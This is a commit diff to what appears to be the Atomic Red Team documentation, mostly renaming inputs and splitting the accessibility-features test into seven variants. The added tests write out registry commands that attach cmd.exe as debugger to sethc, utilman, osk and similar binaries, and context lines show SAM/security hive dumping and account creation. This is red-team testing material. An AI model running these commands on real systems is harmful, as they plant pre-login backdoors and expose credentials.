Generate docs from job=validate_atomics_generate_docs branch=T1015-adds

xiaoyanguoke · May 31, 2018 · 4bb3db1 · 4bb3db1
1 parent f692926
commit 4bb3db1
Show file tree

Hide file tree

Showing 13 changed files with 187 additions and 15 deletions.
diff --git a/atomics/T1002/T1002.md b/atomics/T1002/T1002.md
@@ -48,6 +48,12 @@ TODO
 **Supported Platforms:** Windows
 
 
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| input_file | Path that should be compressed into our output file | Path | *.docx|
+| output_file | Path where resulting compressed data should be placed | Path | exfilthis.rar|
+
 #### Run it with `powershell`!
 ```
 rar a -r #{output_file} #{input_file}

diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md
@@ -187,6 +187,11 @@ http://www.ampliasecurity.com/research/windows-credentials-editor/
 **Supported Platforms:** Windows
 
 
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| output_file | Path where resulting data should be placed | Path | output.txt|
+
 #### Run it with `command_prompt`!
 ```
 wce -o #{output_file}
@@ -195,15 +200,15 @@ wce -o #{output_file}
 <br/>
 
 ## Atomic Test #4 - Registry dump of SAM, creds, and secrets
-Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated 
+Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated
 via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
 
 **Supported Platforms:** Windows
 
 
 #### Run it with `command_prompt`!
 ```
-reg save HKLM\sam sam 
+reg save HKLM\sam sam
 reg save HKLM\system system
 reg save HKLM\security security
 ```

diff --git a/atomics/T1007/T1007.md b/atomics/T1007/T1007.md
@@ -28,7 +28,7 @@ Identify system services
 #### Inputs
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| servicename | Name of service to start stop, query | string | svchost.exe|
+| service_name | Name of service to start stop, query | string | svchost.exe|
 
 #### Run it with `command_prompt`!
 ```

diff --git a/atomics/T1015/T1015.md b/atomics/T1015/T1015.md
@@ -32,12 +32,132 @@ Contributors: Paul Speulstra, AECOM Global Security Operations Center</blockquot
 
 ## Atomic Tests
 
-- [Atomic Test #1 - Attaches Command Prompt As Debugger To Process](#atomic-test-1---attaches-command-prompt-as-debugger-to-process)
+- [Atomic Test #1 - Attaches Command Prompt As Debugger To Process - osk](#atomic-test-1---attaches-command-prompt-as-debugger-to-process---osk)
 
+- [Atomic Test #2 - Attaches Command Prompt As Debugger To Process - sethc](#atomic-test-2---attaches-command-prompt-as-debugger-to-process---sethc)
 
+- [Atomic Test #3 - Attaches Command Prompt As Debugger To Process - utilman](#atomic-test-3---attaches-command-prompt-as-debugger-to-process---utilman)
+
+- [Atomic Test #4 - Attaches Command Prompt As Debugger To Process - magnify](#atomic-test-4---attaches-command-prompt-as-debugger-to-process---magnify)
+
+- [Atomic Test #5 - Attaches Command Prompt As Debugger To Process - narrator](#atomic-test-5---attaches-command-prompt-as-debugger-to-process---narrator)
+
+- [Atomic Test #6 - Attaches Command Prompt As Debugger To Process - DisplaySwitch](#atomic-test-6---attaches-command-prompt-as-debugger-to-process---displayswitch)
+
+- [Atomic Test #7 - Attaches Command Prompt As Debugger To Process - AtBroker](#atomic-test-7---attaches-command-prompt-as-debugger-to-process---atbroker)
+
+
+<br/>
+
+## Atomic Test #1 - Attaches Command Prompt As Debugger To Process - osk
+This allows adversaries to execute the attached process
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| target_executable | File You Want To Attach cmd To | String | osk.exe|
+
+#### Run it with `command_prompt`!
+```
+reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
+```
+<br/>
+<br/>
+
+## Atomic Test #2 - Attaches Command Prompt As Debugger To Process - sethc
+This allows adversaries to execute the attached process
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| target_executable | File You Want To Attach cmd To | String | sethc.exe|
+
+#### Run it with `command_prompt`!
+```
+reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
+```
+<br/>
+<br/>
+
+## Atomic Test #3 - Attaches Command Prompt As Debugger To Process - utilman
+This allows adversaries to execute the attached process
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| target_executable | File You Want To Attach cmd To | String | utilman.exe|
+
+#### Run it with `command_prompt`!
+```
+reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
+```
+<br/>
+<br/>
+
+## Atomic Test #4 - Attaches Command Prompt As Debugger To Process - magnify
+This allows adversaries to execute the attached process
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| target_executable | File You Want To Attach cmd To | String | magnify.exe|
+
+#### Run it with `command_prompt`!
+```
+reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
+```
+<br/>
+<br/>
+
+## Atomic Test #5 - Attaches Command Prompt As Debugger To Process - narrator
+This allows adversaries to execute the attached process
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| target_executable | File You Want To Attach cmd To | String | narrator.exe|
+
+#### Run it with `command_prompt`!
+```
+reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
+```
+<br/>
+<br/>
+
+## Atomic Test #6 - Attaches Command Prompt As Debugger To Process - DisplaySwitch
+This allows adversaries to execute the attached process
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| target_executable | File You Want To Attach cmd To | String | DisplaySwitch.exe|
+
+#### Run it with `command_prompt`!
+```
+reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
+```
+<br/>
 <br/>
 
-## Atomic Test #1 - Attaches Command Prompt As Debugger To Process
+## Atomic Test #7 - Attaches Command Prompt As Debugger To Process - AtBroker
 This allows adversaries to execute the attached process
 
 **Supported Platforms:** Windows
@@ -46,7 +166,7 @@ This allows adversaries to execute the attached process
 #### Inputs
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| target_executable | File You Want To Attach To | String | osk.exe|
+| target_executable | File You Want To Attach cmd To | String | atbroker.exe|
 
 #### Run it with `command_prompt`!
 ```

diff --git a/atomics/T1028/T1028.md b/atomics/T1028/T1028.md
@@ -53,7 +53,7 @@ https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-applicatio
 #### Inputs
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| computername | Name of Computer | string | computer1|
+| computer_name | Name of Computer | string | computer1|
 
 #### Run it with `command_prompt`!
 ```

diff --git a/atomics/T1033/T1033.md b/atomics/T1033/T1033.md
@@ -40,7 +40,7 @@ Identify System owner or users on an endpoint
 #### Inputs
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| computername | Name of remote computer | strong | computer1|
+| computer_name | Name of remote computer | strong | computer1|
 
 #### Run it with `command_prompt`!
 ```

diff --git a/atomics/T1048/T1048.md b/atomics/T1048/T1048.md
@@ -34,7 +34,7 @@ Remote to Local
 |------|-------------|------|---------------|
 | domain | target SSH domain | url | target.example.com|
 | user_name | username for domain | string | atomic|
-| passowrd | password for user | string | atomic|
+| password | password for user | string | atomic|
 
 #### Run it with `sh`!
 ```

diff --git a/atomics/T1053/T1053.md b/atomics/T1053/T1053.md
@@ -83,8 +83,8 @@ Create a task on a remote system
 | task_command | What you want to execute | String | C:\windows\system32\cmd.exe|
 | time | What time 24 Hour | String | 72600|
 | target | Target | String | localhost|
-| UserName | Username DOMAIN\User | String | DOMAIN\user|
-| Password | Password | String | At0micStrong|
+| user_name | Username DOMAIN\User | String | DOMAIN\user|
+| password | Password | String | At0micStrong|
 
 #### Run it with `command_prompt`!
 ```

diff --git a/atomics/T1087/T1087.md b/atomics/T1087/T1087.md
@@ -118,6 +118,11 @@ xxx
 **Supported Platforms:** Linux, macOS
 
 
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| output_file | Path where captured results will be placed | Path | ~/loot.txt|
+
 #### Run it with `sh`!
 ```
 lastlog > #{output_file}

diff --git a/atomics/T1130/T1130.md b/atomics/T1130/T1130.md
@@ -45,6 +45,12 @@ Creates a root CA with openssl
 **Supported Platforms:** Linux
 
 
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key|
+| cert_filename | Path of the CA certificate we create | Path | rootCA.crt|
+
 #### Run it with `sh`!
 ```
 openssl genrsa -out #{key_filename} 4096

diff --git a/atomics/T1136/T1136.md b/atomics/T1136/T1136.md
@@ -46,6 +46,12 @@ Creates a user on a MacOS system with dscl
 **Supported Platforms:** macOS
 
 
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| username | Username of the user to create | String | evil_user|
+| realname | 'realname' to record when creating the user | String | Evil Account|
+
 #### Run it with `bash`!
 ```
 dscl . -create /Users/#{username}

diff --git a/atomics/index.md b/atomics/index.md
@@ -3,7 +3,13 @@
 - [T1156 .bash_profile and .bashrc](./T1156/T1156.md)
   - Atomic Test #1: .bash_profile and .bashrc [macos, linux]
 - [T1015 Accessibility Features](./T1015/T1015.md)
-  - Atomic Test #1: Attaches Command Prompt As Debugger To Process [windows]
+  - Atomic Test #1: Attaches Command Prompt As Debugger To Process - osk [windows]
+  - Atomic Test #2: Attaches Command Prompt As Debugger To Process - sethc [windows]
+  - Atomic Test #3: Attaches Command Prompt As Debugger To Process - utilman [windows]
+  - Atomic Test #4: Attaches Command Prompt As Debugger To Process - magnify [windows]
+  - Atomic Test #5: Attaches Command Prompt As Debugger To Process - narrator [windows]
+  - Atomic Test #6: Attaches Command Prompt As Debugger To Process - DisplaySwitch [windows]
+  - Atomic Test #7: Attaches Command Prompt As Debugger To Process - AtBroker [windows]
 - [T1182 AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
 - [T1103 AppInit DLLs](./T1103/T1103.md)
   - Atomic Test #1: Install AppInit Shim [windows]
@@ -240,7 +246,13 @@
 - [T1134 Access Token Manipulation](./T1134/T1134.md)
   - Atomic Test #1: Access Token Manipulation [windows]
 - [T1015 Accessibility Features](./T1015/T1015.md)
-  - Atomic Test #1: Attaches Command Prompt As Debugger To Process [windows]
+  - Atomic Test #1: Attaches Command Prompt As Debugger To Process - osk [windows]
+  - Atomic Test #2: Attaches Command Prompt As Debugger To Process - sethc [windows]
+  - Atomic Test #3: Attaches Command Prompt As Debugger To Process - utilman [windows]
+  - Atomic Test #4: Attaches Command Prompt As Debugger To Process - magnify [windows]
+  - Atomic Test #5: Attaches Command Prompt As Debugger To Process - narrator [windows]
+  - Atomic Test #6: Attaches Command Prompt As Debugger To Process - DisplaySwitch [windows]
+  - Atomic Test #7: Attaches Command Prompt As Debugger To Process - AtBroker [windows]
 - [T1182 AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
 - [T1103 AppInit DLLs](./T1103/T1103.md)
   - Atomic Test #1: Install AppInit Shim [windows]

diff --git a/atomics/windows-index.md b/atomics/windows-index.md
@@ -84,7 +84,13 @@
 - [T1134 Access Token Manipulation](./T1134/T1134.md)
   - Atomic Test #1: Access Token Manipulation [windows]
 - [T1015 Accessibility Features](./T1015/T1015.md)
-  - Atomic Test #1: Attaches Command Prompt As Debugger To Process [windows]
+  - Atomic Test #1: Attaches Command Prompt As Debugger To Process - osk [windows]
+  - Atomic Test #2: Attaches Command Prompt As Debugger To Process - sethc [windows]
+  - Atomic Test #3: Attaches Command Prompt As Debugger To Process - utilman [windows]
+  - Atomic Test #4: Attaches Command Prompt As Debugger To Process - magnify [windows]
+  - Atomic Test #5: Attaches Command Prompt As Debugger To Process - narrator [windows]
+  - Atomic Test #6: Attaches Command Prompt As Debugger To Process - DisplaySwitch [windows]
+  - Atomic Test #7: Attaches Command Prompt As Debugger To Process - AtBroker [windows]
 - [T1182 AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
 - [T1103 AppInit DLLs](./T1103/T1103.md)
   - Atomic Test #1: Install AppInit Shim [windows]
@@ -119,7 +125,13 @@
 
 # persistence
 - [T1015 Accessibility Features](./T1015/T1015.md)
-  - Atomic Test #1: Attaches Command Prompt As Debugger To Process [windows]
+  - Atomic Test #1: Attaches Command Prompt As Debugger To Process - osk [windows]
+  - Atomic Test #2: Attaches Command Prompt As Debugger To Process - sethc [windows]
+  - Atomic Test #3: Attaches Command Prompt As Debugger To Process - utilman [windows]
+  - Atomic Test #4: Attaches Command Prompt As Debugger To Process - magnify [windows]
+  - Atomic Test #5: Attaches Command Prompt As Debugger To Process - narrator [windows]
+  - Atomic Test #6: Attaches Command Prompt As Debugger To Process - DisplaySwitch [windows]
+  - Atomic Test #7: Attaches Command Prompt As Debugger To Process - AtBroker [windows]
 - [T1182 AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
 - [T1103 AppInit DLLs](./T1103/T1103.md)
   - Atomic Test #1: Install AppInit Shim [windows]